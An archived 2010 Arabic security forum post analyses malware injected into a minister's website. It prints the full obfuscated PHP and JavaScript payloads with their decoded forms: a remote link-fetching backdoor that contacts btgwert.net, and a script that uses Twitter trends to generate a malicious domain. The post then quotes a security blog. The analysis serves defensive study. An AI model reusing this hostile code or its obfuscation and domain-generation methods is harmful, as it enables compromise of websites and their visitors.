الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

موقع مصاب و Twitter في الموضوع

بدأه merouane في 29 مايو 2010 · 4 رد · 1,610 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم و رحمة الله و بركاته

اليوم شعرت بملل لذلك قررت تصفح الجرائد الوطنية و العربية، فشدني عنوان أن وزير سعودي يطالب "تويتر" بأكثر من 30 ألف كلمة و هو نفسه الذي كتب في تويتر

اقتباس
" واليوم انقطع تلفوني لأني نسيت أسدد الفاتورة .. ولكن الحمد لله تداركنا الموقف :) "

فدفعني الفضول أن أبحث عن موقعه (إذا كان له حساب في facbook و twitter إذن 90% لديه موقع إلكتروني) .. وجدته، لكن انطلق avast المجاني ليحذرني أن الموقع مصاب

الموقع الإلكتروني للوزير

اقتباس
hxxp://www.abdelazizkhoja.org

قلبته قليلا بواسطة Malzilla، و سأعرض هنا جولة بسيطة و ليس تحليل مفصل

أولا Base64_Decode

<?php eval(html_entity_decode(
         base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokbGlua3MgPSBuZXcgR2V0TGlua3Mo
                        KTsKCmVjaG8gJGxpbmtzLT5MaW5rczsKCmNsYXNzIEdldExpbmtzCnsK
                        dmFyICRob3N0ID0gImJ0Z3dlcnQubmV0IjsKdmFyICRwYXRoID0gIi9s
                        aW5rL3JlY2VpdmVyL2dldC8iOwp2YXIgJHBhZ2UgPSAiIjsKdmFyICRz
                        aXRlID0gIiI7CnZhciAkTGlua3MgPSAiIjsKCnZhciAkX3NvY2tldF90
                        aW1lb3V0ID0gMTI7CgpmdW5jdGlvbiBHZXRMaW5rcygpCnsKJHRoaXMt
                        PnNpdGUgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pID8gJF9T
                        RVJWRVJbJ0hUVFBfSE9TVCddIDogJEhUVFBfU0VSVkVSX1ZBUlNbJ0hU
                        VFBfSE9TVCddOwokdGhpcy0+cGFnZSA9IGlzc2V0KCRfU0VSVkVSWydT
                        Q1JJUFRfTkFNRSddKSA/ICRfU0VSVkVSWydTQ1JJUFRfTkFNRSddIDog
                        JEhUVFBfU0VSVkVSX1ZBUlNbJ1NDUklQVF9OQU1FJ107CiR0aGlzLT5z
                        aXRlID0gYmFzZTY0X2VuY29kZSgkdGhpcy0+c2l0ZSk7CiR0aGlzLT5w
                        YWdlID0gYmFzZTY0X2VuY29kZSgkdGhpcy0+cGFnZSk7CgokdGhpcy0+
                        TGlua3MgPSAkdGhpcy0+ZmV0Y2hfcmVtb3RlX2ZpbGUoKTsKfQoKZnVu
                        Y3Rpb24gZmV0Y2hfcmVtb3RlX2ZpbGUoKQp7CiRidWZmID0gJyc7CiRm
                        cCA9IGZzb2Nrb3BlbigkdGhpcy0+aG9zdCwgODAsICRlcnJubywgJGVy
                        cnN0ciwgJHRoaXMtPl9zb2NrZXRfdGltZW91dCk7CmlmICghJGZwKSB7
                        Cgp9IGVsc2Ugewokc3RyID0gInNlcnZlcm5hbWU9eyR0aGlzLT5zaXRl
                        fSZzY3JpcHRuYW1lPXskdGhpcy0+cGFnZX0iOwoKJG91dCA9ICJQT1NU
                        IHskdGhpcy0+cGF0aH0gSFRUUC8xLjFcclxuIjsKJG91dCAuPSAiSG9z
                        dDogeyR0aGlzLT5ob3N0fVxyXG4iOwokb3V0IC49ICJDb250ZW50LXR5
                        cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG4i
                        OyAKJG91dCAuPSAiQ29udGVudC1sZW5ndGg6ICIuc3RybGVuKCRzdHIp
                        LiJcclxuIjsKJG91dCAuPSAiQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJc
                        biI7CiRvdXQgLj0gJHN0ci4iXHJcblxyXG4iOwoKZndyaXRlKCRmcCwg
                        JG91dCk7CndoaWxlICghZmVvZigkZnApKSB7CiRidWZmIC49IGZnZXRz
                        KCRmcCwgMTI4KTsKfQpmY2xvc2UoJGZwKTsKJHBhZ2UgPSBleHBsb2Rl
                        KCJcclxuXHJcbiIsICRidWZmKTsKCnJldHVybiAkdGhpcy0+ZGVjb2Rl
                        KCRwYWdlWzFdKTsKfQp9CgpmdW5jdGlvbiBkZWNvZGUoICRjb250ZW50
                        ICkKewokdG1wID0gJGNvbnRlbnQ7CiRlb2wgPSAiXHJcbiI7CiRhZGQg
                        PSBzdHJsZW4gKCAkZW9sICk7CiRzdHIgPSAnJzsKCmRvIHsKJHRtcCA9
                        IGx0cmltICggJHRtcCApOwokcG9zID0gc3RycG9zICggJHRtcCwgJGVv
                        bCApOwokbGVuID0gaGV4ZGVjICggc3Vic3RyICggJHRtcCwgMCwgJHBv
                        cyApICk7Cgokc3RyIC49IHN1YnN0ciAoICR0bXAsICggJHBvcyArICRh
                        ZGQgKSwgJGxlbiApOwoKJHRtcCA9IHN1YnN0ciAoICR0bXAsICggJGxl
                        biArICRwb3MgKyAkYWRkICkgKTsKJGNoZWNrID0gdHJpbSAoICR0bXAg
                        KTsKfQp3aGlsZSAoICEgZW1wdHkgKCAkY2hlY2sgKSApOyAKCnJldHVy
                        biAkc3RyOwp9Cn0=")));
?>

محتواه بعد فك الشيفرة:

error_reporting(0);
$links = new GetLinks();

echo $links - >Links;

class GetLinks {
         var $host = "btgwert.net";
         var $path = "/link/receiver/get/";
         var $page = "";
         var $site = "";
         var $Links = "";

         var $_socket_timeout = 12;

         function GetLinks() {
                  $this - >site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
                  $this - >page = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : $HTTP_SERVER_VARS['SCRIPT_NAME'];
                  $this - >site = base64_encode($this - >site);
                  $this - >page = base64_encode($this - >page);

                  $this - >Links = $this - >fetch_remote_file();
         }

         function fetch_remote_file() {
                  $buff = '';
                  $fp = fsockopen($this - >host, 80, $errno, $errstr, $this - >_socket_timeout);
                  if (!$fp) {

                            }
                 else {
                       $str = "servername={$this->site}&scriptname={$this->page}";

                       $out = "POST {$this->path} HTTP/1.1\r\n";
                       $out. = "Host: {$this->host}\r\n";
                       $out. = "Content-type: application/x-www-form-urlencoded\r\n";
                       $out. = "Content-length: ".strlen($str)."\r\n";
                       $out. = "Connection: Close\r\n\r\n";
                       $out. = $str."\r\n\r\n";

                       fwrite($fp, $out);
                       while (!feof($fp)) {
                             $buff. = fgets($fp, 128);
                           }
                       fclose($fp);
                       $page = explode("\r\n\r\n", $buff);

                      return $this - >decode($page[1]);
                  }
         }

         function decode($content) {
                  $tmp = $content;
                  $eol = "\r\n";
                  $add = strlen($eol);
                  $str = '';

                  do {
                           $tmp = ltrim($tmp);
                           $pos = strpos($tmp, $eol);
                           $len = hexdec(substr($tmp, 0, $pos));

                           $str. = substr($tmp, ($pos + $add), $len);

                           $tmp = substr($tmp, ($len + $pos + $add));
                           $check = trim($tmp);
                  } while (! empty ( $check ));

                  return $str;
         }
}

- - - - - - - - - - -- - - - - -

السكريبت التالي (الأهم)

function t() {
         return z($a);
}
var $a = "Z63zZ3dZ22Z2566uZ256ectZ2569Z256fn Z2563zZ2528Z2563z)Z257breZ2574uZ2572n cZ2561+cZ2562+ccZ252bcd+Z2563e+Z2563z;}Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;pqq;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564Z2563Z2573Z2528Z2564aZ252bdZ2562+Z2564Z2563+Z2564dZ252bZ2564Z2565,Z2531Z2530)Z253bZ2564Z2577(Z2573Z2574Z2529Z253bZ2573Z2574Z253dZ2524Z2561Z253bZ2522;Z22;caZ3dZ22Z2566uncZ2574ionZ2520dcZ2573Z2528dsZ252ceZ2573)Z257bdsZ253dunZ2565sZ2563apZ2565Z22;cdZ3dZ22);Z2573tZ253dst+SZ2574Z2572Z2569ngZ252efroZ256dChZ2561rZ2543oZ2564e((Z2574Z256dZ22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cbZ3dZ22Z2528ds)Z253bstZ253dtmpZ253dZ2527Z2527;forZ2528Z2569Z253d0;Z2569Z253cds.lZ2565nZ22;opZ3dZ22Z2524Z2561Z253dZ2522dZ2577(dcZ2573Z2528Z2563Z2575,14Z2529Z2529;Z2522;Z22;ceZ3dZ22pZ252ecZ2568arCZ256fdeAZ2574(0Z2529^Z2528Z25270x0Z2530Z2527+es))Z2529Z253b}}Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;dzZ3dZ22Z2566Z2575nZ2563tioZ256e dZ2577(Z2574Z2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ25256Z2565tZ252eZ252577ritZ25256Z2535(Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ2572Z252569Z252570Z252574Z252520Z256cZ2561Z25256eZ25256Z2537Z25257Z2535agZ2565Z25253dZ25255cZ25252Z2532jZ2561vaZ25257Z2533Z252563Z2572iZ2525Z25370Z25257Z2534Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ25257Z2530Z2574Z25253eZ2527;Z2565vaZ256c(uZ256eescZ2561pe(Z2574Z2529)}Z253bZ22;ccZ3dZ22gZ2574Z2568Z253bZ2569Z252b+Z2529Z257btmpZ253dZ2564s.sZ256cZ2569cZ2565(i,Z2569Z252b1Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;Z69f (Z64oZ63umeZ6et.cZ6fZ6fkieZ2eZ69Z6edexZ4ff(Z27rZ665f6Z64Z73Z27)Z3dZ3d-1Z29Z7bfunctiZ6fZ6eZ20calZ6cZ62aZ63kZ28xZ29Z7bwindowZ2etwZ20Z3d x;vaZ72 Z64 Z3dZ20Z6eewZ20DatZ65();Z64.sZ65tTiZ6de(Z78[Z22as_Z6fZ66Z22]*1000Z29;Z76Z61r Z68 Z3dZ20d.Z67eZ74UTZ43HoZ75Z72Z73(Z29;Z77iZ6edZ6fw.Z68 Z3d h;Z69Z66 (Z68Z20Z3e 8)Z7bdZ2eZ73Z65tUTZ43DZ61tZ65(Z64.gZ65tUTZ43DaZ74e()Z20- 2Z29;}eZ6csZ65Z7bd.setZ55TZ43DZ61teZ28dZ2egeZ74Z55TCZ44aZ74eZ28) -Z203);Z7dwinZ64ow.Z67d Z3d d;vZ61rZ20Z74imZ65 Z3d nZ65wZ20ArrZ61yZ28Z29Z3bvaZ72 Z73hZ69Z66tZ49ndZ65x Z3d Z22Z22;time[Z22yearZ22]Z20Z3d d.Z67eZ74Z55TZ43FZ75Z6clZ59eaZ72(Z29Z3btimZ65[Z22montZ68Z22] Z3d dZ2egZ65tUZ54CMoZ6eth(Z29+Z31;tiZ6deZ5bZ22daZ79Z22]Z20Z3d d.gZ65tZ55TCDZ61tZ65();Z69f Z28d.gZ65Z74UTZ43MZ6fZ6eZ74Z68(Z29+1Z20Z3c 10)Z7bshiZ66tIZ6edZ65x Z3d tZ69me[Z22yeZ61Z72Z22] + Z22Z2dZ30Z22 + (d.Z67Z65tUZ54CMZ6fntZ68()+Z31);Z7dZ65lsZ65Z7bshiZ66tZ49Z6edeZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22-Z22 + (d.Z67eZ74UZ54CMZ6fZ6eZ74Z68(Z29+1Z29;}Z69fZ20(dZ2egZ65Z74Z55TCZ44ateZ28) Z3c 10)Z7bshiZ66tInZ64ex Z3dsZ68Z69ftZ49ndZ65Z78 +Z20Z22-0Z22Z20+ dZ2egeZ74Z55Z54CZ44atZ65Z28);Z7dZ65lZ73eZ7bZ73hifZ74IndZ65x Z3d sZ68Z69Z66tZ49nZ64exZ20+Z20Z22-Z22 + d.geZ74Z55Z54Z43DZ61teZ28);Z7ddoZ63umZ65nt.Z77rZ69tZ65(Z22Z3csZ63Z72Z22+Z22iptZ20lanZ67Z75ageZ3djaZ76ascZ72Z69ptZ22+Z22 srcZ3dZ27htZ74p:Z2fZ2fseZ61rZ63hZ2eZ74Z77itZ74Z65r.cZ6fmZ2ftrZ65ndZ73Z2fdailyZ2eZ6aZ73oZ6e?Z64Z61tZ65Z3dZ22+ shZ69Z66tIZ6edeZ78+Z22&callZ62Z61Z63kZ3dcallZ62aZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7d fuZ6eZ63Z74iZ6fn Z63Z61Z6clbaZ63kZ32(xZ29Z7bwindoZ77Z2etZ77 Z3d xZ3bsc(Z27rfZ35f6dZ73Z27,2,7Z29;Z65Z76alZ28uZ6eeZ73capZ65(Z64zZ2bcZ7aZ2boZ70+stZ29+Z27dZ77(Z64zZ2bcz(Z24Z61+sZ74Z29Z29;Z27Z29;dZ6fZ63Z75meZ6et.wZ72itZ65Z28Z24a);Z7ddocZ75meZ6et.wZ72itZ65(Z22Z3cimZ67 Z73rcZ3dZ27htZ74p:Z2fZ2fsearZ63hZ2eZ74wiZ74terZ2ecoZ6dZ2fimagesZ2fseZ61rchZ2frssZ2eZ70nZ67Z27 wiZ64thZ3d1Z20heZ69gZ68Z74Z3d1 sZ74yZ6ceZ3dZ27visZ69biZ6ciZ74yZ3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22iptZ20lanZ67uZ61geZ3djavaZ73criZ70tZ22+Z22 srZ63Z3dZ27httpZ3aZ2fZ2fsearchZ2etwZ69tZ74er.Z63omZ2ftZ72Z65ndsZ2fdaiZ6cy.Z6asonZ3fcalZ6cbaZ63kZ3dcalZ6cbaZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65lZ73eZ7b$Z61Z3dZ27Z27};functionZ20scZ28cnmZ2cv,eZ64)Z7bvZ61r Z65xdZ3dnZ65wZ20DZ61teZ28);eZ78d.Z73etZ44atZ65(Z65Z78dZ2egeZ74DaZ74e(Z29Z2bedZ29;Z64ocuZ6deZ6eZ74Z2eZ63oZ6fkZ69eZ3dcnZ6d+ Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;eZ78pirZ65sZ3dZ27+exd.tZ6fZ47MTSZ74rZ69ngZ28Z29Z3b};";

function z(s) {
         r = "";
         for (i = 0; i < s.length; i++) {
                  if (s.charAt(i) == "Z") {
                           s1 = "%"
                  } else {
                           s1 = s.charAt(i)
                  }
                  r = r + s1;
         }
         return unescape(r);
}
var x = 0;
eval(t());

نتيجة الدالة

cz="%66u%6ect%69%6fn %63z%28%63z)%7bre%74u%72n c%61+c%62+cc%2bcd+%63e+%63z;}%3b";
cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;pqq;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
st="%73t%3d%22$%61%3ds%74;%64%63%73%28%64a%2bd%62+%64%63+%64d%2b%64%65,%31%30)%3b%64%77(%73%74%29%3b%73%74%3d%24%61%3b%22;";
ca="%66unc%74ion%20dc%73%28ds%2ce%73)%7bds%3dun%65s%63ap%65";
cd=");%73t%3dst+S%74%72%69ng%2efro%6dCh%61r%43o%64e((%74%6d";
de="209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cb="%28ds)%3bst%3dtmp%3d%27%27;for%28%69%3d0;%69%3cds.l%65n";op="%24%61%3d%22d%77(dc%73%28%63%75,14%29%29;%22;";ce="p%2ec%68arC%6fdeA%74(0%29^%28%270x0%30%27+es))%29%3b}}";dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%";dz="%66%75n%63tio%6e d%77(%74%29%7bca%3d%27%2564ocu%256de%256%65t%2e%2577rit%256%35(%252%32%27;ce%3d%27%2522)%27;cb%3d%27%253csc%72%2569%2570%2574%2520%6c%61%256e%256%37%257%35ag%65%253d%255c%252%32j%61va%257%33%2563%72i%25%370%257%34%255c%2522%253e%27;cc%3d%27%253c%255c%252fsc%72i%257%30%74%253e%27;%65va%6c(u%6eesc%61pe(%74%29)}%3b";cc="g%74%68%3b%69%2b+%29%7btmp%3d%64s.s%6c%69c%65(i,%69%2b1";db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
if (document.cookie.indexOf('rf5f6ds')==-1)
{
 function callback(x)
 {
   window.tw = x;
   var d = new Date();
   d.setTime(x["as_of"]*1000);
   var h = d.getUTCHours();
   window.h = h;
   if (h > 8)
   {
     d.setUTCDate(d.getUTCDate() - 2);
   }
   else
   {
     d.setUTCDate(d.getUTCDate() - 3);
   }
   window.gd = d;
   var time = new Array();
   var shiftIndex = "";
   time["year"] = d.getUTCFullYear();
   time["month"] = d.getUTCMonth()+1;
   time["day"] = d.getUTCDate();
   if (d.getUTCMonth()+1 < 10)
   {
     shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);
   }
   else
   {
     shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);
   }
   if (d.getUTCDate() < 10)
   {
     shiftIndex =shiftIndex + "-0" + d.getUTCDate();
   }
   else
   {
     shiftIndex = shiftIndex + "-" + d.getUTCDate();
   }
   document.write("<scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=callback2'>" + "</scr" + "ipt>");
 }
 function callback2(x)
 {
   window.tw = x;
   sc('rf5f6ds',2,7);
   eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');
   document.write($a);
 }
 document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");
}
else
{
 $a=''
};
function sc(cnm,v,ed)
{
 var exd=new Date();
 exd.setDate(exd.getDate()+ed);
 document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
};

نتيحة السطر التالي (رقم 53 في الكود أعلاه)

 eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st))

هـو

 function dw(t)
 {
   ca='%64ocu%6de%6et.%77rit%65(%22';
   ce='%22)';
   cb='%3cscr%69%70%74%20la%6e%67%75age%3d%5c%22java%73%63ri%70%74%5c%22%3e';
   cc='%3c%5c%2fscri%70t%3e';
   eval(unescape(t))
 };
 function cz(cz)
 {
   return ca+cb+cc+cd+ce+cz;
 };
 $a="dw(dcs(cu,14));";
 st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";
 dw(dz+cz($a+st));
 var d='fbcmfir.com';
 var shiftIndex = 0;
 for (var i in window.tw.trends)
 {
   if (window.h > 8 && window.h < 21 && i.indexOf(' 07') > -1)
   {
     shiftIndex = window.tw.trends[4].query.charCodeAt(1) + window.tw.trends[4].query.length;
     break;
   }
   else if ((window.h < 9 ||  window.h > 20) && i.indexOf(' 18') > -1)
   {
     shiftIndex = window.tw.trends[4].query.charCodeAt(1) + 10 +window.tw.trends[4].query.length;
     break;
   }
 }
 if (shiftIndex == 0 )
 {
   shiftIndex = window.tw.trends[6].query.charCodeAt(1) + 7 +window.tw.trends[6].query.length;
 }
 if (shiftIndex > 0)
 {
   var time = new Array();
   time['year'] = window.gd.getUTCFullYear();
   time['month'] = window.gd.getUTCMonth()+1;
   time['day'] = window.gd.getUTCDate();
   var d='fbcmfir.com';
   var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');
   var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
   var numbers = new Array(1,2,3,4,5,6,7,8,9);
   function CalculateMagicNumber(day, month, year, index)
   {
     return (((year + (index * day)) + (month ^ day) * index) + day);
   }
   var yearCh1, yearCh2, monthCh, dayCh, num;
   num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);
   yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25];
   yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)];
   monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];
   dayCh = letters[((time['day'] * 6) % 27)];
   timeCh = dayCh = letters[((time['day'] * num) % 24)];
   $a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');}

الآن يظهر عنوان هو fbcmfir .com، تحذرنا منه Google للتصفح الآمن

---------------------------------------------------------------------------

لا بد انكم لاحظتم كلمة twitter في أحد الأكواد السابقة، و بما أنني لا أستعمل twitter لا أفقه ماهية API التي توفرها لذلك سأدعكم مع اقتباس من مدونة الموقع Unmask Parasites

Hackers Use Twitter API To Trigger Malicious Scripts

11 Nov 09

....

Today, I’ve found an interesting obfuscated script that used Twitter API to trigger malicious process.

Here’s the story

In Unmask Parasites logs I noticed a site that reported the following script
(I removed a lot of code in the middle)
:

$a="Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb ... }eval(z($a));

The first round of deobfuscation produced another obfuscated script that contained one part in clear text. That part injected a script tag that fetched current week’s top 30 trending topics from Twitter using their API. Here’s the injected code:


<script language=javascript src='http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags'></script>
<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' />

This looks pretty benign. Could the rest of the script be benign too? After all, sometimes webmasters use legitimate obfuscated scripts (e.g. to protect intellectual property or to hide some data from screen scrapers).

However the way the script was obfuscated and the place in the HTML code where it was injected to (right after the closing
</html>
tag) suggested that it didn’t belong to the site and tried to do something malicious. So I continued the deobfuscation.

After a few more rounds, I finally discovered a call to “
fbcmfir .com
